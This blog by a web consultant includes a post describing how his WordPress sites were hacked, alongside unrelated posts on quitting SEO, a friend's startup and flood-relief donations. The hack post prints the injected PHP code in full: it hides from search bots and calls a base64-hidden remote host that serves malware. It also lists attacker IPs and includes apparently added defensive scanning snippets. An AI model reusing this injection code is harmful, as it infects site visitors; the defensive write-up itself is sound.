WordPress Sites all HACKED!
Posted on February 9, 2012 by Jexley
It’s been a while since I’ve updated, and this is for shame because I have a lot of stuff happen to me and a lot of neat shit to say sometimes.
But, the News Headline is: “ALL MY WORDPRESS SITES WERE HACKED.”
I went through each of these sites and found that the only thing in common was they’re WordPress and most (but not all) had the “All in One SEO” plugin.
- Some had different versions, though none lower than 2.8 (most were 3.3.1, the latest).
- Some had different file permissions on the “wp-content” folder (777 on some, 666 on a few, 555 on others).
- Some are hosted on Windows servers, most on Linux.
- Some were set up by others, most set up by me.
There are other similarities, I’m sure, probably as many as there are differences.
Regardless, here’s how they got in…
From my log files (FTP and general): /home/jexanaly/ftpchk3.php a _ i r [mainftpaccount] ftp 1 * c Mon Feb 06 07:49:31
Where [mainftpaccount] is the name of my main FTP account. They put the “ftpchk3.php” file and “counter.php” in the root from the IP 61.191.190.51 and then, within a half hour, they start hitting my site with a download and then immediate upload of every index.php file in ALL of my folders… from this IP: 188.138.112.15
They had to be targeting WordPress though, because they also went into each of my WordPress Theme Folders and edited the “footer.php” file and “home.php” if it existed (in addition to “index.php”).
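The download-then-immediate-upload pattern described above can be pulled out of an FTP transfer log in the standard xferlog field order; this is an added example, not the author's code. The log lines are constructed, the IPs come from documentation ranges, and the account name `mainftp` and the paths are placeholders.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in xferlog field order (not the author's real log).
SAMPLE_LOG = """\
Mon Feb 06 07:49:31 2012 1 203.0.113.7 2048 /home/site/ftpchk3.php a _ i r mainftp ftp 0 * c
Mon Feb 06 08:15:02 2012 1 198.51.100.9 412 /home/site/index.php a _ o r mainftp ftp 0 * c
Mon Feb 06 08:15:03 2012 1 198.51.100.9 1630 /home/site/index.php a _ i r mainftp ftp 0 * c
Mon Feb 06 08:15:05 2012 1 198.51.100.9 903 /home/site/wp-content/themes/my theme/footer.php a _ o r mainftp ftp 0 * c
Mon Feb 06 08:15:06 2012 1 198.51.100.9 2121 /home/site/wp-content/themes/my theme/footer.php a _ i r mainftp ftp 0 * c
Tue Feb 07 10:00:00 2012 1 192.0.2.44 5000 /home/site/wp-content/uploads/logo.png b _ i r mainftp ftp 0 * c
""".splitlines()

def parse_xferlog(line):
    """Parse one xferlog line; returns None if it is too short to be one."""
    tok = line.split()
    if len(tok) < 18:            # 8 leading fields + filename + 9 trailing fields
        return None
    when = datetime.strptime(" ".join(tok[:5]), "%a %b %d %H:%M:%S %Y")
    tail = tok[-9:]              # type, flag, direction, mode, user, service, ...
    return {"time": when, "host": tok[6],
            "file": " ".join(tok[8:-9]),   # filename may contain spaces
            "direction": tail[2],          # "i" = upload, "o" = download
            "user": tail[4], "status": tail[8]}

def rewritten_files(lines, window=timedelta(minutes=5)):
    """Return {host: [files]} that a host downloaded and re-uploaded within window."""
    fetched = {}                 # (host, file) -> time of last completed download
    hits = defaultdict(list)
    for rec in filter(None, map(parse_xferlog, lines)):
        if rec["status"] != "c":           # ignore incomplete transfers
            continue
        key = (rec["host"], rec["file"])
        if rec["direction"] == "o":
            fetched[key] = rec["time"]
        elif rec["direction"] == "i" and key in fetched:
            if rec["time"] - fetched[key] <= window:
                hits[rec["host"]].append(rec["file"])
    return dict(hits)

if __name__ == "__main__":
    for host, files in rewritten_files(SAMPLE_LOG).items():
        print(host, "rewrote", len(files), "file(s):", *files, sep="\n  ")
```

Editing a file over FTP by hand produces the same download/upload pair, so the signal is one host rewriting many files in quick succession, not a single hit.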
They put this ratbagbastardshit code into each of those files:
<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {$sResult[0]=" ";
        echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>
This is a cURL call (uses PHP to pull the content of a URL) to this website: http://hotlogupdate.com/stat/stat.php
DO NOT, REPEAT, DO NOT VISIT THIS WEBSITE.
These scumbagshitwadcrapfaces use the file on that website above to hit you with what’s called an “Exploit Pack” where it’s got just about every virus ever created by some pasty-white 32-year old virgin suckin’ down Mountain Dew and Fritos and trying to take over the world before he levels up or his mom asks him to get his ass out of the basement and clean his room.
So yeah, don’t go there. If you do, you might catch what I got, the “System Check” virus and then the “iexplore.exe” virus.
I fixed “System Check” by restarting into Safe Mode and running MalwareBytes, SuperAntiSpyware, Spybot S&D and CCleaner.
I fixed “iexplore.exe” by loading a six-shooter with one bullet, spinning the chamber, putting the gun to my head, and pulling the trigger. When I realised that I was still alive and that all the crap I’d tried hadn’t worked, I restarted into Safe Mode, ran Combofix.exe (all night too, for despite the fact that it says “Seriously infected systems may take 20 minutes” it was still running 8 hours later…), then ran SuperAntiSpyware, TrojanKiller, MalwareBytes, Spybot, HijackThis, CCleaner (which wipes out too many Windows user settings to be worth it) and then downloaded and installed avast! That seemed to do it, though the handgun would’ve probably been easier.
So, that’s if you’re infected.
If it’s just your poor websites that have gotten hit, then first deny those sunsabiches access from your .htaccess file:
order allow,deny
allow from all
deny from 61.191.190.
deny from 188.138.112.
This will deny the entire IP range. You might miss out on some visitors from China or Amsterdam, but I reckon it’s worth it to avoid the sh*t you’ll get otherwise.
Next, I went through and started fixing the index.php files by getting rid of all that extra code. Off 13 infected websites. It took a long time.
When I looked again, those bastardcockfacehells had come back and reinfected all my files, despite the fact that I changed all my FTP passwords.
So, after you restrict their IP and change all your FTP passwords, you should check out this fix I wrote:
MASSIVE DISCLAIMER: This script uses fopen, fread and fwrite so you must have the appropriate folder permissions. It will also rewrite files that are infected, so DO BE CAREFUL. I tested this bugger by unceremoniously truncating every goddam file on the website you are now on, so I know it works for me, but if you mess with any of that code, you’ll probably nuke your site too. So don’t.
- Download the file and unzip it.
- Copy fix-hacker-shit.php to your root directory.
- Go to a browser and punch in “http://www.yoursitehere.com/fix-hacker-shit.php”.
- Crack a beer, watch it work.
If you don’t see anything, then you weren’t infected.
And if you were, isn’t this way much better than going through fifty eleventy brazillian geedarnfickety folders and changing all the index files back?
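Before running anything that rewrites files, a read-only pass can list which PHP files carry the injected block and which URL its base64 string hides. This is an added example, not the author's fix-hacker-shit.php; the regex assumes the block looks like the one printed above, and the sample file and the `example.invalid` URL are constructed.

```python
import base64
import binascii
import re
from pathlib import Path

# Assumption: the block opens with the $sRetry guard and runs to the first
# PHP close tag after the "Statistic code end" comment, as printed in the post.
INJECTED = re.compile(
    r"<\?php\s*if\s*\(\s*!isset\(\$sRetry\)\s*\).*?Statistic code end.*?\?>\s*",
    re.DOTALL,
)
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
DROPPED = {"ftpchk3.php", "counter.php"}   # file names reported in the post

# Constructed infected file: shortened block with a placeholder URL.
PLACEHOLDER_URL = b"http://example.invalid/stat.php"
SAMPLE = (
    "<?php\nif (!isset($sRetry))\n{\nglobal $sRetry;\n$sRetry = 1;\n"
    "$stCurlLink = base64_decode( '"
    + base64.b64encode(PLACEHOLDER_URL).decode() + "').'?ip=';\n"
    "echo $sResult; // Statistic code end\n}\n?>\n"
    "<?php get_header(); ?>\n"
)

def decode_literals(php):
    """Return the plaintext of every base64_decode('...') string literal."""
    out = []
    for blob in B64_LITERAL.findall(php):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue                      # not valid base64, skip it
        out.append(raw.decode("utf-8", "replace"))
    return out

def inspect(php):
    """Return (infected, cleaned_text, decoded_strings); nothing is written."""
    m = INJECTED.search(php)
    if not m:
        return False, php, []
    return True, INJECTED.sub("", php), decode_literals(m.group(0))

def scan(root):
    """Walk root read-only and yield (path, finding) for suspicious files."""
    for path in sorted(Path(root).rglob("*.php")):
        if path.name in DROPPED:          # a name match is a lead, not proof
            yield path, "dropped file"
            continue
        infected, _, urls = inspect(path.read_text(errors="replace"))
        if infected:
            yield path, "injected block -> " + ", ".join(urls)
```

Calling `list(scan("/path/to/webroot"))` gives the list of files to review; `inspect()` also returns the text with the block removed, so the change can be diffed before anything is overwritten.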
Now, for those of you that Googled and Googled and couldn’t find a blasted thing on this subject, here’s some keywords to help others get here:
- fix wordpress hack php code
- wordpres website hacked
- how to fix wp hack
- cleanup code from wordpress hack
- yummy tasty republican cheerleaders (kidding Googs, KIDDING! Don’t taze me bro)
That’s it. I hope some or all of this helps.
Good Luck and Have a Good Website.
-Judd
Category: Resources | 2 Comments
A New Beginning…
Posted on September 10, 2011 by Jexley
When I started this company over 4 years ago, I named it “Jex Analytics” because I loved Web Analytics. I knew that no matter what I did in All Things Web, I would always be able to fall back on my skills in reporting and analysis.
Not because it’s sexy, because it’s not. By any means.
Not because it’s safe either, though it pretty much is.
No, I loved analysis and reporting because it was what really told the truth about your success. You can look at stats and graphs all day, but without something interpreting them into your language, you’ll never really know what they can mean.
And don’t even get me started on rankings. Rankings are useless if they don’t improve your business, and too many shysters in the SEO industry have been trying to say differently for years now.
Rankings do NOT tell you about your success.
They can, but they’re not all of it.
But, for a while, I had to focus on rankings. SEO was what people knew how to ask for and what they thought was going to bring them success. For years, I’ve been telling them that it’s only a step, but not the whole deal. For years now, only my clients (most of them) have been listening.
So I was an SEO expert for a while. I still am, but I don’t like most people to know that, because then they’ll want me to weave that Black Magic on their website, and I don’t do that any more.
With the most recent addition to the Exleys Down Under, my life is changing, and it only stands to reason that my business should change too.
In short: Out with the SEO, in with the Analytics & Reporting.
I’m sure I’ll rant later on how important it all is, consider yourself warned.
For now though, an introduction to the next chapter.
Have a Good Website.
-Judd
Category: Latest News | No Comments
I’m Done With SEO.
Posted on April 6, 2011 by Jexley
After a few months worth of thinking about it, I’ve decided that I’m not going to offer SEO any longer.
The Sisyphean adventure of trying to educate the marketplace on certain aspects of this industry while still trying to win business and convince people that I’m A) better than my competitors and B) actually good too, was just too much.
I thought I’d get smart, and create a Client Expectations Document, where I outline in precise detail each step of the project. Where I give minimum time limits to wait for results. Where I politely make it clear not to ring me, just email me because it’s so much easier for my life.
And these things all got ignored. Not by everybody, but by just enough clients that I realised I wasn’t actually happy with a new project any more, I was dreading it. I was waiting with dread for each new client to cause problems, or expect things outside of project parameters, or to simply stop returning my emails…
I started this business because I wanted to help people with their websites. I wanted to give them analysis and reports that mattered, that made sense to them, that told them important things about their websites. I started doing SEO because people were looking for it (nobody seems to search "web analytics expert" much) and because it could pay the bills.
4 years on, and that’s all I’ve been doing… paying the bills.
Actually not quite. Little by little, I built some tools in PHP and WordPress that helped me keep up on client reporting, Google Rankings, Search Traffic, and AdWords success. They helped me with Keyword Research, Competition Research, Link Analysis and Overall Website Analysis. I put them on a website called Jex Solutions, and made it a Membership site.
I kind of figured, "Man, these tools do SO much for MY business and MY clients, I’ll make them available for all!"
Then hardly anybody signed up. Then those that DID sign up, couldn’t figure out how to use anything. It was an epic failure.
But, by that same token, it was a tremendous success. I learned more about what really makes a website successful than I ever would’ve just looking at stats and graphs.
I started a blog, open to other web folks of wonderfulness, called Stone Soup – Recipes for a Better Web. A place for web professionals to take a no-holds-barred approach to blogging about the web. A place where we could say bad words as much as we wanted and bag on clients that pissed us off… all with a lesson, of course.
I’ve registered, and have big plans for, Have a Good Website, a site that’s going to have anything from the basics of picking a web designer to the intricacies of finding the right kind of inbound linking plan for your SEO.
I also wrote a book! A romance, followed by one I’m working on that’s sci-fi futuretasticness. The books, and the wonderful people I’m involved with in my writer’s group, have inspired me to make a website for authors called Page Buoy. It’s not built yet, it’s in progress, but it’s going to be unique and pretty awesome for writers of just about anything. I’m stoked.
And finally, wife and I are about to have our 4th child. Little Boy Blue is due on the 20th and I’m going to take a few months off just to enjoy my last child, my baby boy.
During that time, I’m going to:
- Finish Page Buoy.
- Publish my first book.
- Finish my second book.
- Build Have a Good Website.
- Revamp this website, and have a slew of reports to choose from, that all centre around Making Google Analytics Simple.
- Revamp Jex Solutions, to showcase the Web Consulting side of my business.
- Have a kickass time with my new baby.
Sure, it’s a lot, but it’s what I want to be doing.
Wish me luck.
Category: SEO, State of the Web | 1 Comment
A Nod to Old Friends
Posted on February 11, 2011 by Jexley
Back in my college days I was a bit of an outsider as a Montana Mountain Boy at Texas A&M. I didn’t have a lot of friends and my interests almost solely resided in an altitude > sea level. I loved hockey though and even though I’d only mucked about on a frozen pond, I got some cheap inline skates, a cheap plastic stick and fashioned a net out of leftover plumbing from the junkyard.
I went out, found a parking lot, and played. I wasn’t out to make friends or find like-minded folks, I just wanted to play. But the other stuff happened anyway. One day a couple of guys, who were from up North too, pulled over and asked me to come and play with them on Sundays. A great group got bigger and bigger and soon they built a league. Those two guys graduated and got married and I took over the league, filling my days with the thing I loved most.
Fast forward more years than I’m happy to count out loud, and those two guys are still at it, doing what they love and inviting others in on it. Through the magic of Facebook they’ve found me again, and have "pulled over" on this Interwebs Highway and said, "Hey, you’re doing something we like doing too!"
They like web stuff, I like web stuff, and we’re all good at it.
They’ve recently launched Cherry Tree and here’s a few of Tay’s words on it:
Our vision is to create a web product that helps parents change the child’s behavior through two mechanisms; 1) positive reinforcement by the parents and other key figures in the child’s life and 2) an incentive based gaming mechanism that keeps the child engaged and habitualizes the behavior. Or put more simply, think of it as a super duper sticker chart combined with a Facebook-ish status and messaging system that is private to a family.
So, bless ‘em, here’s my two old friends, getting their skates on, grabbing their sticks, and setting a game alongside a busy street.
If you get a chance, pull over and check ‘em out. You never know how it’ll turn out.
Category: Around the Web, State of the Web | No Comments
Flood Relief Donation Info
Posted on January 14, 2011 by Jexley
When I got tired of hearing "oh, just send cash, not goods" I got super stoked to hear that there’s someone here in Perth that’s organising to ship tangible goods to help out for not just the Queensland Flood Relief, but also help for the Gascoyne River Floods up near Carnarvon and also south of Perth to the victims of those horrible arson Bushfires in Lake Clifton.
His name is Cam Wilkie, his outfit is Cambuild, and he actually packs more awesome than a roundhouse kick from Chuck Norris.
From information from his website (for those of you too lazy to click):
Thank you very much for offering your much-needed assistance. Here’s a list of useful essentials that will be transported to the Queensland Flood Appeal over east.
• Tinned food/Pet food
• Toothpaste
• Toothbrush
• Soap/Shower gel
• Shampoo/Conditioner
• Deodorant
• Detergent
• Baby formula
• Nappies
• Battery operated radios
• Sanitary products
• Shoes/boots
• Camp beds
• Pillows
• Sleeping bags/blankets
• Towels
• Mosquito nets/repellents
• Lanterns
• Torches
• Batteries
• Tools
• Tarpaulin
• Plastic cups, plates, cutlery
• Veterinary supplies
Please box your donations and label them (on the side of the box) to assist in locating and distributing items.
The first truck will be leaving Friday 14th January in the afternoon. This will be the first of a number of trucks which will leave over the next couple of weeks.
Please deliver your items to:
Cambuild, 1/5 Leeway Court, Osborne Park, WA 6017
If you have any other queries please feel free to contact the Cambuild office on (08) 9244 8522.
When a wonderful gal in my family asked about a dropoff point South of the River here in Perth, I said that if there wasn’t one, I’d put my hand up to run one.
*raises hand*
I’ll run one! I’m in Langford, so email me for an address (judd AT jexanalytics.com).
I’m planning on making a run to Osborne Park next Friday afternoon, so try and get stuff here before then.
Here’s the best part too, the part I know you’ve been waiting for, this guy Cam rang me and explained that this isn’t just a truckload of your second-hand crap getting dumped on the streets of Brisbane. This is a corporate-level organised effort involving Salvos and the Red Cross to sort, box, ship, store and eventually distribute items that are relatively non-perishable and are going to be sorely needed in the coming weeks and months. He did it for the Victoria Bushfires and he’s doing it now.
Yes, the Queensland Government would rather money, who wouldn’t? For those of us that want to do more than just punch in some credit card numbers and feel smug while we sip our latte and marvel at how dry our feet are, this is right up our alley.
Cam’s got a crew of volunteers sorting things and they will send you home if you try to dump junk. Bring good items, usable items, that can survive being sorted, packed, shipped and stored. Do your best to sort them beforehand and I’ll do some sorting here.
When wondering what to donate, the best way I thought of it was to remember what I was after when our house flooded during the huge storm here in Perth last March.
Yes, Salvo’s has heaps of clothing, so keep it, and when I was flooded I was happy enough to dry a t-shirt out, but boots and shoes get wet, armpits stink, mozzies bite, and when all that shit’s pouring down and wearing you down nothing on this earth feels as good as a nice shower and getting clean again. Particularly after you’re digging out the wet and mouldy fuzzy slippers from under your bed.
Also the battery-powered/windup radio thing. One of the most comforting things that got us through a long and lonely, wet, candlelit night was hearing "the world" out there. Even if it was just some DJ reporting things and playing Bon Jovi for the 17th time that day. It’s nice to hear from others in your community.
So there you go. There are going to be pallets of stuff headed for the areas that need this stuff. It won’t get there tomorrow but it WILL BE THERE when they need it, and that’s awesome.
Email or ring me and we’ll rock from there.


Copyright 2012 © Jexley Enterprises - Making web statistics simple.